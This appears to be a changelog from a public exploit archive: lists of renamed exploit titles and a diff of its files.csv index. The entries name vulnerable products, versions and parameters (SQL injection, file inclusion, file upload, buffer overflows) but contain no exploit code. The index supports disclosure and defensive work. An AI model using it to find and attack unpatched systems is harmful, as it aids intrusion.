DB: 2016-11-12

1 new exploits

PunBB 2.0.10 - (Register Multiple Users) Denial of Service
PunBB 2.0.10 - (Register Multiple Users) Denial Of Service

QuickTime 7.4.1 - QTPlugin.ocx Multiple Stack Overflow Vulnerabilities
QuickTime 7.4.1 - 'QTPlugin.ocx' Multiple Stack Overflow Vulnerabilities

Apple iTunes 8.0.2.20/QuickTime 7.5.5 - (.mov) Multiple Off By Overflow (PoC)
Apple iTunes 8.0.2.20/QuickTime 7.5.5 - '.mov' Multiple Off By Overflow (PoC)

Apple QuickTime - MOV File Parsing Memory Corruption
Apple QuickTime - '.mov' Parsing Memory Corruption

Apple QuickTime - (rtsp URL Handler) Stack Buffer Overflow
Apple QuickTime - 'rtsp URL Handler' Stack Buffer Overflow
Apple QuickTime (Windows 2000) - (rtsp URL Handler) Buffer Overflow
Apple QuickTime 7.1.3 - (HREFTrack) Cross-Zone Scripting Exploit
Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Buffer Overflow
Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting

Citrix Presentation Server Client - WFICA.OCX ActiveX Heap Buffer Overflow
Citrix Presentation Server Client - 'WFICA.OCX' ActiveX Heap Buffer Overflow

Philips VOIP841 - (Firmware 1.0.4.800) Multiple Vulnerabilities
Philips VOIP841 'Firmware 1.0.4.800' - Multiple Vulnerabilities

Ourgame GLWorld 2.x - hgs_startNotify() ActiveX Buffer Overflow
Ourgame GLWorld 2.x - 'hgs_startNotify()' ActiveX Buffer Overflow

Citrix Presentation Server Client 9.200 - WFICA.OCX ActiveX Component Heap Buffer Overflow

PunBB 1.2.4 - (change_email) SQL Injection
PunBB 1.2.4 - 'id' Parameter SQL Injection

PHP Live Helper 1.x - 'abs_path' Remote File Inclusion
PHP Live Helper 1.x - 'abs_path' Parameter Remote File Inclusion

PHP Live! 3.2.1 - (help.php) Remote File Inclusion
PHP Live! 3.2.1 - 'help.php' Remote File Inclusion

PHP Live Helper 2.0 - 'abs_path' Remote File Inclusion
PHP Live Helper 2.0 - 'abs_path' Parameter Remote File Inclusion

nuBoard 0.5 - (index.php site) Remote File Inclusion
nuBoard 0.5 - 'site' Parameter Remote File Inclusion

vKios 2.0.0 - (products.php cat) SQL Injection
vKios 2.0.0 - 'cat' Parameter SQL Injection

Joomla! Component xfaq 1.2 - (aid) SQL Injection
Joomla! Component xfaq 1.2 - 'aid' Parameter SQL Injection

nuBoard 0.5 - (threads.php ssid) SQL Injection
nuBoard 0.5 - 'ssid' Parameter SQL Injection
Joomla! Component paxxgallery 0.2 - (iid) SQL Injection
Joomla! Component MCQuiz 0.9 Final - (tid) SQL Injection
Joomla! Component Quiz 0.81 - (tid) SQL Injection
Joomla! Component mediaslide (albumnum) - Blind SQL Injection
LookStrike Lan Manager 0.9 - Remote File Inclusion / Local File Inclusion
Joomla! Component paxxgallery 0.2 - 'iid' Parameter SQL Injection
Joomla! Component MCQuiz 0.9 Final - 'tid' Parameter SQL Injection
Joomla! Component Quiz 0.81 - 'tid' Parameter SQL Injection
Joomla! Component mediaslide - 'albumnum' Blind SQL Injection
LookStrike Lan Manager 0.9 - Remote / Local File Inclusion

PHP Live! 3.2.2 - (questid) SQL Injection (1)
PHP Live! 3.2.2 - 'questid' Parameter SQL Injection (1)

Mambo Component Quran 1.1 - (surano) SQL Injection
Mambo Component Quran 1.1 - 'surano' Parameter SQL Injection

Simple CMS 1.0.3 - (indexen.php area) SQL Injection
Simple CMS 1.0.3 - 'area' Parameter SQL Injection

XPWeb 3.3.2 - (download.php url) Remote File Disclosure
XPWeb 3.3.2 - 'url' Parameter Remote File Disclosure
Joomla! Component com_pccookbook - (user_id) SQL Injection
Joomla! Component com_clasifier - 'cat_id' SQL Injection
PHP-Nuke Module books SQL - 'cid' SQL Injection
XOOPS Module myTopics - 'articleId' SQL Injection
Joomla! Component com_pccookbook - 'user_id' Parameter SQL Injection
Joomla! Component com_clasifier - 'cat_id' Parameter SQL Injection
PHP-Nuke Module books SQL - 'cid' Parameter SQL Injection
XOOPS Module myTopics - 'articleId' Parameter SQL Injection
PHP-Nuke Module Sections - (artid) SQL Injection
PHP-Nuke Module EasyContent - (page_id) SQL Injection
RunCMS Module MyAnnonces - 'cid' SQL Injection
XOOPS Module eEmpregos - 'cid' SQL Injection
XOOPS Module Classifieds - 'cid' SQL Injection
PHP-Nuke Modules Okul 1.0 - (okulid) SQL Injection
Joomla! Component com_hwdvideoshare - SQL Injection
PHP-Nuke Module Docum - (artid) SQL Injection
Globsy 1.0 - (file) Remote File Disclosure
PHP-Nuke Module Inhalt - 'cid' SQL Injection
PHP-Nuke Module Sections - 'artid' Parameter SQL Injection
PHP-Nuke Module EasyContent - 'page_id' Parameter SQL Injection
RunCMS Module MyAnnonces - 'cid' Parameter SQL Injection
XOOPS Module eEmpregos - 'cid' Parameter SQL Injection
XOOPS Module Classifieds - 'cid' Parameter SQL Injection
PHP-Nuke Modules Okul 1.0 - 'okulid' Parameter SQL Injection
Joomla! Component Highwood Design hwdVideoShare - SQL Injection
PHP-Nuke Module Docum - 'artid' Parameter SQL Injection
Globsy 1.0 - 'file' Parameter Remote File Disclosure
PHP-Nuke Module Inhalt - 'cid' Parameter SQL Injection

Joomla! Component paxxgallery 0.2 - (gid) Blind SQL Injection
Joomla! Component paxxgallery 0.2 - 'gid' Parameter Blind SQL Injection

Pre Simple CMS - (Authentication Bypass) SQL Injection
Pre Simple CMS - SQL Injection (Authentication Bypass)

Joomla! Component com_pccookbook - (recipe_id) Blind SQL Injection
Joomla! Component com_pccookbook - 'recipe_id' Parameter Blind SQL Injection

PHP Live! 3.2.1/2 - '&x=' Blind SQL Injection
PHP Live! 3.2.1/2 - 'x' Parameter Blind SQL Injection

PHP Live! 3.2.2 - (questid) SQL Injection (2)
PHP Live! 3.2.2 - 'questid' Parameter SQL Injection (2)

PunBB Automatic Image Upload 1.3.5 - Delete Arbitrary File Exploit
PunBB Automatic Image Upload 1.3.5 - Arbitrary File Delete

Really Simple CMS 0.3a - (pagecontent.php PT) Local File Inclusion
Really Simple CMS 0.3a - 'PT' Parameter Local File Inclusion

Simple CMS Framework 1.0 - (page) SQL Injection
Simple CMS Framework 1.0 - 'page' Parameter SQL Injection

PHP Live! 3.3 - (deptid) SQL Injection
PHP Live! 3.3 - 'deptid' Parameter SQL Injection

Getsimple CMS 2.01 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
Getsimple CMS 2.01 - Multiple Vulnerabilities

GNUBoard 4.33.02 - tp.php PATH_INFO SQL Injection
GNUBoard 4.33.02 - 'tp.php' PATH_INFO SQL Injection

auraCMS 1.5 - Multiple Cross-Site Scripting Vulnerabilities

PunBB 1.x - profile.php User Profile Edit Module SQL Injection
PunBB 1.x - 'profile.php' User Profile Edit Module SQL Injection

PunBB 1.2.x - search.php SQL Injection
PunBB 1.2.x - 'search.php' SQL Injection

PHP Live! 3.0 - Status_Image.php Cross-Site Scripting

PHP Live Helper 2.0 - chat.php Cross-Site Scripting
PHP Live! 3.2.2 - setup/transcripts.php search_string Parameter Cross-Site Scripting
PHP Live! 3.2.2 - 'index.php' l Parameter Cross-Site Scripting
PHP Live! 3.2.2 - PHPlive/message_box.php Multiple Parameter Cross-Site Scripting
artmedic weblog - artmedic_print.php date Parameter Cross-Site Scripting
artmedic weblog - 'index.php' jahrneu Parameter Cross-Site Scripting

PunBB 1.2.x - 'p' Parameter Multiple Cross-Site Scripting Vulnerabilities

PunBB 1.3 - 'viewtopic.php' Cross-Site Scripting
InvoicePlane 1.4.8 - Password Reset

Getsimple CMS 2.01 - admin/template/error_checking.php Multiple Parameter Cross-Site Scripting

Getsimple CMS 2.01 - 'admin/changedata.php' Cross-Site Scripting
Getsimple CMS 2.01 - 'changedata.php' Cross-Site Scripting

Getsimple CMS 2.03 - 'admin/upload-ajax.php' Arbitrary File Upload
Getsimple CMS 2.03 - 'upload-ajax.php' Arbitrary File Upload

PunBB 1.3.6 - 'browse.php' Cross-Site Scripting
Getsimple CMS 3.1 - admin/theme.php err Parameter Reflected Cross-Site Scripting
Getsimple CMS 3.1 - admin/pages.php error Parameter Reflected Cross-Site Scripting
Getsimple CMS 3.1 - admin/index.php Multiple Parameter Reflected Cross-Site Scripting
Getsimple CMS 3.1 - admin/upload.php path Parameter Cross-Site Scripting
Getsimple CMS - /admin/edit.php Multiple Parameter Cross-Site Scripting
Getsimple CMS - /admin/filebrowser.php Multiple Parameter Cross-Site Scripting

files.csv

@@ -284,7 +284,7 @@ id,file,description,date,author,platform,type,port
 1489,platforms/multiple/dos/1489.pl,"Invision Power Board 2.1.4 - (Register Users) Denial of Service",2006-02-10,SkOd,multiple,dos,0
 1496,platforms/hardware/dos/1496.c,"D-Link (Wireless Access Point) - (Fragmented UDP) Denial of Service",2006-02-14,"Aaron Portnoy",hardware,dos,0
 1500,platforms/windows/dos/1500.cpp,"Microsoft Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0
-1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - (Register Multiple Users) Denial of Service",2006-02-20,K4P0,php,dos,0
+1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - (Register Multiple Users) Denial Of Service",2006-02-20,K4P0,php,dos,0
 1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)",2006-02-25,"Jerome Athias",windows,dos,0
 1535,platforms/windows/dos/1535.c,"CrossFire 1.8.0 - (oldsocketmode) Remote Buffer Overflow (PoC)",2006-02-27,"Luigi Auriemma",windows,dos,0
 1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service",2006-02-28,"Evgeny Legerov",bsd,dos,0
@@ -692,7 +692,7 @@ id,file,description,date,author,platform,type,port
 5067,platforms/windows/dos/5067.pl,"dBpowerAMP Audio Player Release 2 - '.m3u' Buffer Overflow (PoC)",2008-02-05,securfrog,windows,dos,0
 5085,platforms/windows/dos/5085.txt,"jetAudio 7.0.5 - '.asx' Remote Stack Overflow (PoC)",2008-02-08,"laurent gaffié",windows,dos,0
 5086,platforms/windows/dos/5086.html,"ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow (PoC)",2008-02-08,Trancek,windows,dos,0
-5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 - QTPlugin.ocx Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié",windows,dos,0
+5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 - 'QTPlugin.ocx' Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié",windows,dos,0
 5122,platforms/windows/dos/5122.pl,"Rosoft Media Player 4.1.8 - '.m3u' File Remote Buffer Overflow (PoC)",2008-02-14,securfrog,windows,dos,0
 5142,platforms/windows/dos/5142.c,"DESlock+ <= 3.2.6 - 'DLMFENC.sys' Local Kernel Ring0 link list zero (PoC)",2008-02-18,mu-b,windows,dos,0
 5151,platforms/ios/dos/5151.pl,"Apple iOS 4.0.3 - DPAP Server Denial of Service",2008-02-18,"David Wharton",ios,dos,0
@@ -863,7 +863,7 @@ id,file,description,date,author,platform,type,port
 7226,platforms/windows/dos/7226.html,"Google Chrome - MetaCharacter URI Obfuscation",2008-11-25,"Aditya K Sood",windows,dos,0
 7249,platforms/windows/dos/7249.php,"i.Scribe SMTP Client 2.00b - (wscanf) Remote Format String (PoC)",2008-11-27,"Alfons Luja",windows,dos,0
 7262,platforms/windows/dos/7262.pl,"Microsoft Office - Communicator (SIP) Remote Denial of Service",2008-11-28,"Praveen Darshanam",windows,dos,0
-7296,platforms/windows/dos/7296.txt,"Apple iTunes 8.0.2.20/QuickTime 7.5.5 - (.mov) Multiple Off By Overflow (PoC)",2008-11-30,"laurent gaffié",windows,dos,0
+7296,platforms/windows/dos/7296.txt,"Apple iTunes 8.0.2.20/QuickTime 7.5.5 - '.mov' Multiple Off By Overflow (PoC)",2008-11-30,"laurent gaffié",windows,dos,0
 7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow (PoC)",2008-11-30,Encrypt3d.M!nd,windows,dos,0
 7307,platforms/windows/dos/7307.txt,"Electronics Workbench - '.ewb' Local Stack Overflow (PoC)",2008-11-30,Zigma,windows,dos,0
 7314,platforms/windows/dos/7314.txt,"Maxum Rumpus 6.0 - Multiple Remote Buffer Overflow Vulnerabilities",2008-12-01,"BLUE MOON",windows,dos,0
@@ -3718,7 +3718,7 @@ id,file,description,date,author,platform,type,port
 29535,platforms/osx/dos/29535.txt,"Telestream Flip4Mac - 'WMV' File Remote Memory Corruption",2007-01-27,kf,osx,dos,0
 29536,platforms/windows/dos/29536.html,"Microsoft Internet Explorer 5.0.1 - Multiple ActiveX Controls Denial of Service Vulnerabilities",2007-01-29,"Alexander Sotirov",windows,dos,0
 29540,platforms/solaris/dos/29540.c,"Sun Solaris 10 - ICMP Unspecified Remote Denial of Service",2007-01-30,kcope,solaris,dos,0
-39839,platforms/osx/dos/39839.txt,"Apple QuickTime - MOV File Parsing Memory Corruption",2016-05-19,"Francis Provencher",osx,dos,0
+39839,platforms/osx/dos/39839.txt,"Apple QuickTime - '.mov' Parsing Memory Corruption",2016-05-19,"Francis Provencher",osx,dos,0
 29683,platforms/linux/dos/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service",2007-02-27,"Steve Grubb",linux,dos,0
 29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (Denial of Service)",2013-11-12,"Necmettin COSKUN",windows,dos,0
 29546,platforms/windows/dos/29546.rb,"Provj 5.1.5.8 - 'm3u' Buffer Overflow (PoC)",2013-11-12,"Necmettin COSKUN",windows,dos,0
@@ -9197,10 +9197,10 @@ id,file,description,date,author,platform,type,port
 3055,platforms/windows/remote/3055.html,"WinZip 10.0 - FileView ActiveX Controls Remote Overflow",2006-12-31,XiaoHui,windows,remote,0
 3058,platforms/windows/remote/3058.html,"Rediff Bol Downloader - (ActiveX Control) Execute Local File Exploit",2006-12-31,"Gregory R. Panakkal",windows,remote,0
 3063,platforms/windows/remote/3063.pl,"Formbankserver 1.9 - (Name) Directory Traversal",2007-01-01,Bl0od3r,windows,remote,0
-3064,platforms/multiple/remote/3064.rb,"Apple QuickTime - (rtsp URL Handler) Stack Buffer Overflow",2007-01-01,MoAB,multiple,remote,0
+3064,platforms/multiple/remote/3064.rb,"Apple QuickTime - 'rtsp URL Handler' Stack Buffer Overflow",2007-01-01,MoAB,multiple,remote,0
 3067,platforms/windows/remote/3067.txt,"QK SMTP 3.01 - (RCPT TO) Remote Buffer Overflow (2)",2007-01-01,"Jacopo Cervini",windows,remote,25
-3072,platforms/windows/remote/3072.py,"Apple QuickTime (Windows 2000) - (rtsp URL Handler) Buffer Overflow",2007-01-03,"Winny Thomas",windows,remote,0
+3072,platforms/windows/remote/3072.py,"Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Buffer Overflow",2007-01-03,"Winny Thomas",windows,remote,0
-3077,platforms/osx/remote/3077.rb,"Apple QuickTime 7.1.3 - (HREFTrack) Cross-Zone Scripting Exploit",2007-01-03,MoAB,osx,remote,0
+3077,platforms/osx/remote/3077.rb,"Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting",2007-01-03,MoAB,osx,remote,0
 3084,platforms/windows/remote/3084.txt,"Adobe Acrobat Reader Plugin 7.0.x - (acroreader) Cross-Site Scripting",2007-01-05,"Stefano Di Paola",windows,remote,0
 3086,platforms/windows/remote/3086.py,"CA BrightStor ARCserve - 'tapeeng.exe' Remote Buffer Overflow",2007-01-05,"Winny Thomas",windows,remote,6502
 3092,platforms/windows/remote/3092.pm,"NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow (Metasploit)",2007-01-07,"Jacopo Cervini",windows,remote,80
@@ -9537,11 +9537,11 @@ id,file,description,date,author,platform,type,port
 5087,platforms/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module - Remote Buffer Overflow",2008-02-09,rgod,windows,remote,0
 5100,platforms/windows/remote/5100.html,"ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow",2008-02-10,Elazar,windows,remote,0
 5102,platforms/windows/remote/5102.html,"FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow",2008-02-12,"MC Group Ltd.",windows,remote,0
-5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client - WFICA.OCX ActiveX Heap Buffer Overflow",2008-02-12,Elazar,windows,remote,0
+5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client - 'WFICA.OCX' ActiveX Heap Buffer Overflow",2008-02-12,Elazar,windows,remote,0
 5111,platforms/windows/remote/5111.html,"IBM Domino Web Access Upload Module - Overwrite (SEH)",2008-02-13,Elazar,windows,remote,0
-5113,platforms/hardware/remote/5113.txt,"Philips VOIP841 - (Firmware 1.0.4.800) Multiple Vulnerabilities",2008-02-14,ikki,hardware,remote,0
+5113,platforms/hardware/remote/5113.txt,"Philips VOIP841 'Firmware 1.0.4.800' - Multiple Vulnerabilities",2008-02-14,ikki,hardware,remote,0
 5150,platforms/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel - Remote File Inclusion",2008-02-18,Crackers_Child,hardware,remote,0
-5153,platforms/windows/remote/5153.asp,"Ourgame GLWorld 2.x - hgs_startNotify() ActiveX Buffer Overflow",2008-02-19,luoluo,windows,remote,0
+5153,platforms/windows/remote/5153.asp,"Ourgame GLWorld 2.x - 'hgs_startNotify()' ActiveX Buffer Overflow",2008-02-19,luoluo,windows,remote,0
 5188,platforms/windows/remote/5188.html,"Rising AntiVirus Online Scanner - Insecure Method Flaw Exploit",2008-02-25,"John Smith",windows,remote,0
 5190,platforms/windows/remote/5190.html,"Move Networks Quantum Streaming Player Control - Buffer Overflow",2008-02-26,Elazar,windows,remote,0
 5193,platforms/windows/remote/5193.html,"D-Link MPEG4 SHM Audio Control - 'VAPGDecoder.dll 1.7.0.5' Buffer Overflow",2008-02-26,rgod,windows,remote,0
@@ -13521,7 +13521,6 @@ id,file,description,date,author,platform,type,port
 29167,platforms/windows/remote/29167.rb,"Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",windows,remote,0
 29171,platforms/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional - File Handling Buffer Overflow",2006-11-23,LSsec.com,windows,remote,0
 29210,platforms/php/remote/29210.rb,"Open Flash Chart 2 - Arbitrary File Upload (Metasploit)",2013-10-26,Metasploit,php,remote,80
-29230,platforms/windows/remote/29230.html,"Citrix Presentation Server Client 9.200 - WFICA.OCX ActiveX Component Heap Buffer Overflow",2006-12-06,"Andrew Christensen",windows,remote,0
 29273,platforms/hardware/remote/29273.pl,"Watchguard Firewall XTM 11.7.4u1 - Remote Buffer Overflow",2013-10-29,st3n,hardware,remote,8080
 29281,platforms/windows/remote/29281.txt,"Hilgraeve HyperAccess 8.4 - Multiple Remote Command Execution Vulnerabilities",2006-12-14,"Brett Moore",windows,remote,0
 29290,platforms/php/remote/29290.c,"Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution",2013-10-29,kingcope,php,remote,80
@@ -15747,7 +15746,7 @@ id,file,description,date,author,platform,type,port
 30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - Redirect.php Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0
 923,platforms/cgi/webapps/923.pl,"The Includer CGI 1.0 - Remote Command Execution (3)",2005-04-08,K-C0d3r,cgi,webapps,0
 925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Admin Authentication Bypass (SQL Injection)",2005-04-09,LaMeR,asp,webapps,0
-928,platforms/php/webapps/928.py,"PunBB 1.2.4 - (change_email) SQL Injection",2005-04-11,"Stefan Esser",php,webapps,0
+928,platforms/php/webapps/928.py,"PunBB 1.2.4 - 'id' Parameter SQL Injection",2005-04-11,"Stefan Esser",php,webapps,0
 939,platforms/php/webapps/939.pl,"S9Y Serendipity 0.8beta4 - exit.php SQL Injection",2005-04-13,kre0n,php,webapps,0
 954,platforms/cgi/webapps/954.pl,"E-Cart 1.1 - (index.cgi) Remote Command Execution",2005-04-25,z,cgi,webapps,0
 980,platforms/cgi/webapps/980.pl,"I-Mall Commerce - 'i-mall.cgi' Remote Command Execution",2005-05-04,"Jerome Athias",cgi,webapps,0
@@ -16172,7 +16171,7 @@ id,file,description,date,author,platform,type,port
 1922,platforms/php/webapps/1922.php,"Joomla! 1.0.9 - (Weblinks) Blind SQL Injection",2006-06-17,rgod,php,webapps,0
 1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 - 'ipath' Remote File Inclusion",2006-06-17,Basti,php,webapps,0
 1925,platforms/php/webapps/1925.txt,"Indexu 5.0.1 - (admin_template_path) Remote File Inclusion",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0
-1926,platforms/php/webapps/1926.txt,"PHP Live Helper 1.x - 'abs_path' Remote File Inclusion",2006-06-18,SnIpEr_SA,php,webapps,0
+1926,platforms/php/webapps/1926.txt,"PHP Live Helper 1.x - 'abs_path' Parameter Remote File Inclusion",2006-06-18,SnIpEr_SA,php,webapps,0
 1928,platforms/php/webapps/1928.txt,"IdeaBox 1.1 - (gorumDir) Remote File Inclusion",2006-06-19,Kacper,php,webapps,0
 1929,platforms/php/webapps/1929.txt,"Micro CMS 0.3.5 - (microcms_path) Remote File Inclusion",2006-06-19,CeNGiZ-HaN,php,webapps,0
 1930,platforms/asp/webapps/1930.txt,"WeBBoA Host Script 1.1 - SQL Injection",2006-06-19,EntriKa,asp,webapps,0
@@ -16246,7 +16245,7 @@ id,file,description,date,author,platform,type,port
 2049,platforms/php/webapps/2049.txt,"SiteDepth CMS 3.0.1 - (SD_DIR) Remote File Inclusion",2006-07-20,Aesthetico,php,webapps,0
 2050,platforms/php/webapps/2050.php,"LoudBlog 0.5 - (id) SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0
 2058,platforms/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - (cfg_racine) Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0
-2060,platforms/php/webapps/2060.txt,"PHP Live! 3.2.1 - (help.php) Remote File Inclusion",2006-07-23,magnific,php,webapps,0
+2060,platforms/php/webapps/2060.txt,"PHP Live! 3.2.1 - 'help.php' Remote File Inclusion",2006-07-23,magnific,php,webapps,0
 2062,platforms/php/webapps/2062.txt,"Mambo Component MoSpray 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",php,webapps,0
 2063,platforms/php/webapps/2063.txt,"ArticlesOne 07232006 - (page) Remote File Inclusion",2006-07-23,CyberLord,php,webapps,0
 2064,platforms/php/webapps/2064.txt,"Mambo Component Mam-Moodle alpha - Remote File Inclusion",2006-07-23,jank0,php,webapps,0
@@ -16287,7 +16286,7 @@ id,file,description,date,author,platform,type,port
 2117,platforms/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,php,webapps,0
 2118,platforms/php/webapps/2118.php,"MyBloggie 2.1.4 - (trackback.php) Multiple SQL Injections",2006-08-07,rgod,php,webapps,0
 2119,platforms/php/webapps/2119.txt,"PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0
-2120,platforms/php/webapps/2120.txt,"PHP Live Helper 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0
+2120,platforms/php/webapps/2120.txt,"PHP Live Helper 2.0 - 'abs_path' Parameter Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0
 2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 - (pfad) Remote File Inclusion",2006-08-07,SHiKaA,php,webapps,0
 2122,platforms/php/webapps/2122.txt,"ME Download System 1.3 - 'header.php' Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0
 2123,platforms/php/webapps/2123.txt,"SQLiteWebAdmin 0.1 - (tpl.inc.php) Remote File Inclusion",2006-08-07,SirDarckCat,php,webapps,0
@@ -17918,7 +17917,7 @@ id,file,description,date,author,platform,type,port
 4603,platforms/php/webapps/4603.txt,"Quick and Dirty Blog (qdblog) 0.4 - (categories.php) Local File Inclusion",2007-11-03,GoLd_M,php,webapps,0
 4604,platforms/php/webapps/4604.txt,"scWiki 1.0 Beta 2 - (common.php pathdot) Remote File Inclusion",2007-11-03,GoLd_M,php,webapps,0
 4605,platforms/php/webapps/4605.txt,"Vortex Portal 1.0.42 - Remote File Inclusion",2007-11-04,ShAy6oOoN,php,webapps,0
-4606,platforms/php/webapps/4606.txt,"nuBoard 0.5 - (index.php site) Remote File Inclusion",2007-11-04,GoLd_M,php,webapps,0
+4606,platforms/php/webapps/4606.txt,"nuBoard 0.5 - 'site' Parameter Remote File Inclusion",2007-11-04,GoLd_M,php,webapps,0
 4607,platforms/php/webapps/4607.txt,"SyndeoCMS 2.5.01 - (cmsdir) Remote File Inclusion",2007-11-04,mdx,php,webapps,0
 4608,platforms/php/webapps/4608.php,"JBC Explorer 7.20 RC 1 - Remote Code Execution",2007-11-05,DarkFig,php,webapps,0
 4609,platforms/asp/webapps/4609.txt,"ASP Message Board 2.2.1c - SQL Injection",2007-11-05,Q7x,asp,webapps,0
@@ -18275,54 +18274,54 @@ id,file,description,date,author,platform,type,port
 5097,platforms/php/webapps/5097.txt,"SAPID CMF Build 87 - 'last_module' Parameter Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0
 5098,platforms/php/webapps/5098.txt,"PacerCMS 0.6 - 'last_module' Parameter Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0
 5099,platforms/php/webapps/5099.php,"Mix Systems CMS - 'parent/id' Parameters SQL Injection",2008-02-10,halkfild,php,webapps,0
-5101,platforms/php/webapps/5101.pl,"vKios 2.0.0 - (products.php cat) SQL Injection",2008-02-12,NTOS-Team,php,webapps,0
+5101,platforms/php/webapps/5101.pl,"vKios 2.0.0 - 'cat' Parameter SQL Injection",2008-02-12,NTOS-Team,php,webapps,0
 5103,platforms/php/webapps/5103.txt,"Joomla! Component rapidrecipe 1.6.5 - SQL Injection",2008-02-12,S@BUN,php,webapps,0
 5104,platforms/php/webapps/5104.txt,"Joomla! Component pcchess 0.8 - SQL Injection",2008-02-12,S@BUN,php,webapps,0
 5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 - 'albums' Pramater SQL Injection",2008-02-12,DNX,php,webapps,0
 5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 Beta - 'Language' Local File Inclusion",2008-02-13,GoLd_M,php,webapps,0
-5109,platforms/php/webapps/5109.txt,"Joomla! Component xfaq 1.2 - (aid) SQL Injection",2008-02-13,S@BUN,php,webapps,0
+5109,platforms/php/webapps/5109.txt,"Joomla! Component xfaq 1.2 - 'aid' Parameter SQL Injection",2008-02-13,S@BUN,php,webapps,0
 5112,platforms/jsp/webapps/5112.txt,"jspwiki 2.4.104 / 2.5.139 - Multiple Vulnerabilities",2008-02-13,"BugSec LTD",jsp,webapps,0
 5114,platforms/php/webapps/5114.pl,"Affiliate Market 0.1 Beta - Cross-Site Scripting / SQL Injection",2008-02-14,"Khashayar Fereidani",php,webapps,0
-5115,platforms/php/webapps/5115.txt,"nuBoard 0.5 - (threads.php ssid) SQL Injection",2008-02-14,"Khashayar Fereidani",php,webapps,0
+5115,platforms/php/webapps/5115.txt,"nuBoard 0.5 - 'ssid' Parameter SQL Injection",2008-02-14,"Khashayar Fereidani",php,webapps,0
 5116,platforms/php/webapps/5116.txt,"artmedic weblog 1.0 - Multiple Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0
-5117,platforms/php/webapps/5117.txt,"Joomla! Component paxxgallery 0.2 - (iid) SQL Injection",2008-02-14,S@BUN,php,webapps,0
+5117,platforms/php/webapps/5117.txt,"Joomla! Component paxxgallery 0.2 - 'iid' Parameter SQL Injection",2008-02-14,S@BUN,php,webapps,0
-5118,platforms/php/webapps/5118.txt,"Joomla! Component MCQuiz 0.9 Final - (tid) SQL Injection",2008-02-14,S@BUN,php,webapps,0
+5118,platforms/php/webapps/5118.txt,"Joomla! Component MCQuiz 0.9 Final - 'tid' Parameter SQL Injection",2008-02-14,S@BUN,php,webapps,0
-5119,platforms/php/webapps/5119.txt,"Joomla! Component Quiz 0.81 - (tid) SQL Injection",2008-02-14,S@BUN,php,webapps,0
+5119,platforms/php/webapps/5119.txt,"Joomla! Component Quiz 0.81 - 'tid' Parameter SQL Injection",2008-02-14,S@BUN,php,webapps,0
-5120,platforms/php/webapps/5120.pl,"Joomla! Component mediaslide (albumnum) - Blind SQL Injection",2008-02-14,Inphex,php,webapps,0
+5120,platforms/php/webapps/5120.pl,"Joomla! Component mediaslide - 'albumnum' Blind SQL Injection",2008-02-14,Inphex,php,webapps,0
-5121,platforms/php/webapps/5121.txt,"LookStrike Lan Manager 0.9 - Remote File Inclusion / Local File Inclusion",2008-02-14,MhZ91,php,webapps,0
+5121,platforms/php/webapps/5121.txt,"LookStrike Lan Manager 0.9 - Remote / Local File Inclusion",2008-02-14,MhZ91,php,webapps,0
 5123,platforms/php/webapps/5123.txt,"Scribe 0.2 - 'index.php' Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0
 5124,platforms/php/webapps/5124.txt,"freePHPgallery 0.6 - Cookie Local File Inclusion",2008-02-14,MhZ91,php,webapps,0
-5125,platforms/php/webapps/5125.txt,"PHP Live! 3.2.2 - (questid) SQL Injection (1)",2008-02-14,Xar,php,webapps,0
